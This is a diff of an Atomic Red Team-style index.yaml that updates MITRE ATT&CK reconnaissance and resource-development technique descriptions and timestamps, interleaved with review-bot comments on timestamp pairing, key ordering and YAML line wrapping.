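Review bot: the description edit at @@ -51248 is correctly paired with a new `modified` value at @@ -51256 (`2021-04-15T02:52:41.901Z`), and that pairing is the thing to check in every hunk below, since `modified` is what a consumer of index.yaml would use to notice an upstream refresh. The pattern holds for the VPS, Vulnerabilities and Web Services hunks that follow (03:03, 03:16, 02:53, 03:04 on 2021-04-15), so the wording change (dropping the `Before compromising a victim,` prefix) is not being applied without its timestamp.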
@@ -51283,7 +54386,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Virtual Private Server description: |- - Before compromising a victim, adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig) + Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig) Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party. id: attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0 @@ -51291,7 +54394,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:01:45.792Z' + modified: '2021-04-15T03:03:59.919Z' created: '2020-10-01T00:55:17.771Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -51317,7 +54420,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Vulnerabilities description: |- - Before compromising a victim, adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database) + Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database) An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)). id: attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327 
@@ -51325,7 +54428,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-16T01:54:39.868Z' + modified: '2021-04-15T03:16:32.119Z' created: '2020-10-15T02:59:38.628Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -51344,39 +54447,38 @@ resource-development: atomic_tests: [] T1583.006: technique: + created: '2020-10-01T00:50:29.936Z' + modified: '2021-04-15T02:53:19.246Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54 + description: Adversaries may register for web services that can be used during + targeting. A variety of popular websites exist for adversaries to register + for a web-based service that can be abused during later stages of the adversary + lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) + or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). + Using common services, such as those offered by Google or Twitter, makes it + easier for adversaries to hide in expected noise. By utilizing a web service, + adversaries can make it difficult to physically tie back operations to them. + name: Web Services + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1583.006 url: https://attack.mitre.org/techniques/T1583/006 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Web Services - description: Before compromising a victim, adversaries may register for web - services that can be used during targeting. A variety of popular websites - exist for adversaries to register for a web-based service that can be abused - during later stages of the adversary lifecycle, such as during Command and - Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration - Over Web Service](https://attack.mitre.org/techniques/T1567). 
Using common - services, such as those offered by Google or Twitter, makes it easier for - adversaries to hide in expected noise. By utilizing a web service, adversaries - can make it difficult to physically tie back operations to them. - id: attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-22T17:59:17.456Z' - created: '2020-10-01T00:50:29.936Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1584.006: technique: 
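Review bot: the T1583.006 hunk at @@ -51344 is almost entirely key-order churn: `created`, `modified`, `kill_chain_phases`, `type`, `id`, `description`, `name`, `created_by_ref` and `object_marking_refs` move above `external_references`, and `x_mitre_platforms`, `x_mitre_is_subtechnique` and `x_mitre_version` move above `x_mitre_detection`, while the only substantive changes are the dropped `Before compromising a victim,` prefix and `modified: '2021-04-15T02:53:19.246Z'`. The T1608.* entries added above keep the `external_references`-first order, so the generator is emitting keys in whatever order the upstream STIX object happens to present them. Sorting keys, or normalising to one fixed field order before dumping, would keep future refreshes down to the lines that actually changed and make hunks like this reviewable.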
@@ -51392,14 +54494,13 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Web Services - description: 'Before compromising a victim, adversaries may compromise access - to third-party web services that can be used during targeting. A variety of - popular websites exist for legitimate users to register for web-based services, - such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take - ownership of a legitimate user''s access to a web service and use that web - service as infrastructure in support of cyber operations. Such web services - can be abused during later stages of the adversary lifecycle, such as during - Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) + description: 'Adversaries may compromise access to third-party web services that + can be used during targeting. A variety of popular websites exist for legitimate + users to register for web-based services, such as GitHub, Twitter, Dropbox, + Google, etc. Adversaries may try to take ownership of a legitimate user''s + access to a web service and use that web service as infrastructure in support + of cyber operations. Such web services can be abused during later stages of + the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected 
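Review bot: apart from dropping `Before compromising a victim,`, the hunk at @@ -51392 is re-wrap churn: the single-quoted `description` scalar is re-folded at the serializer's line width, so eight lines are replaced by seven that carry the same text (including the `user''s` escape). The neighbouring Compromise Infrastructure: Virtual Private Server entry at @@ -51283 uses the literal `|-` style and gets a one-line diff for the same kind of edit; emitting long scalars as `|-` consistently, or dumping without a wrap width, would confine these upstream wording tweaks to the sentence that changed.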
@@ -51411,7 +54512,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:02:30.304Z' + modified: '2021-04-15T03:04:40.184Z' created: '2020-10-01T01:01:00.176Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -51428,7 +54529,7 @@ reconnaissance: technique: id: attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b description: |- - Before compromising a victim, adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. + Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). name: Active Scanning @@ -51451,7 +54552,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:06:50.402Z' + modified: '2021-04-15T03:20:09.600Z' created: '2020-10-02T16:53:16.526Z' x_mitre_platforms: - PRE 
@@ -51464,8 +54565,8 @@ reconnaissance: Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. x_mitre_data_sources: - - Packet capture - - Network device logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1591.002: technique: 
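Review bot: `x_mitre_data_sources` for Active Scanning changes format at @@ -51464, not just value: the old free-text names `Packet capture` and `Network device logs` become `'Network Traffic: Network Traffic Flow'` and `'Network Traffic: Network Traffic Content'`, i.e. a `Data Source: Data Component` pair in one string. Anything downstream that matches on the old strings, or that splits index.yaml fields on `:` when building the CSV/Markdown indexes, needs updating, and the new values must stay quoted because of the embedded colon-space.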
@@ -51482,7 +54583,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Business Relationships description: |- - Before compromising a victim, adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. + Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). 
Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f @@ -51490,7 +54591,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:08:59.209Z' + modified: '2021-04-15T03:36:58.964Z' created: '2020-10-02T16:27:55.713Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51517,7 +54618,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: CDNs description: |- - Before compromising a victim, adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region. + Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region. Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)). id: attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75 
@@ -51525,7 +54626,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:17:09.684Z' + modified: '2021-04-15T03:47:55.905Z' created: '2020-10-02T16:59:56.648Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51551,7 +54652,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Client Configurations description: |- - Before compromising a victim, adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. + Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). 
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c @@ -51559,7 +54660,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:52:10.774Z' + modified: '2021-04-15T03:22:14.288Z' created: '2020-10-02T16:47:16.719Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51616,7 +54717,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Credentials description: |- - Before compromising a victim, adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. + Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. 
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161 @@ -51624,7 +54725,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-27T02:27:31.090Z' + modified: '2021-04-15T03:26:44.352Z' created: '2020-10-02T14:55:43.815Z' x_mitre_contributors: - Vinayak Wadhwa, Lucideus 
@@ -51657,7 +54758,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DNS description: |- - Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. + Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea 
@@ -51665,7 +54766,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:02:39.701Z' + modified: '2021-04-15T03:29:18.740Z' created: '2020-10-02T15:47:10.102Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51694,7 +54795,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DNS/Passive DNS description: |- - Before compromising a victim, adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. + Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532 
@@ -51702,7 +54803,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:19:40.584Z' + modified: '2021-04-15T03:49:13.409Z' created: '2020-10-02T16:57:45.044Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51732,7 +54833,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Determine Physical Locations description: |- - Before compromising a victim, adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. + Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). 
id: attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867 @@ -51740,7 +54841,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:09:48.419Z' + modified: '2021-04-15T03:37:35.863Z' created: '2020-10-02T16:32:33.126Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51769,7 +54870,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Digital Certificates description: |- - Before compromising a victim, adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. + Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. Adversaries may search digital certificate data to gather actionable information. 
Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca @@ -51777,7 +54878,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:19:15.289Z' + modified: '2021-04-15T03:48:37.628Z' created: '2020-10-02T16:58:58.738Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51809,7 +54910,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Domain Properties description: |- - Before compromising a victim, adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. + Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). 
Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d @@ -51817,7 +54918,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-25T22:58:22.915Z' + modified: '2021-04-15T03:30:33.508Z' created: '2020-10-02T15:46:24.670Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51830,6 +54931,21 @@ reconnaissance: atomic_tests: [] T1589.002: technique: + created: '2020-10-02T14:56:24.866Z' + modified: '2021-04-15T03:27:19.702Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262 + description: |- + Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. + + Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). + name: Email Addresses + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1589.002 
@@ -51842,29 +54958,14 @@ reconnaissance: url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Email Addresses - description: |- - Before compromising a victim, adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. - - Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). 
- id: attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-24T03:46:04.662Z' - created: '2020-10-02T14:56:24.866Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1589.003: technique: 
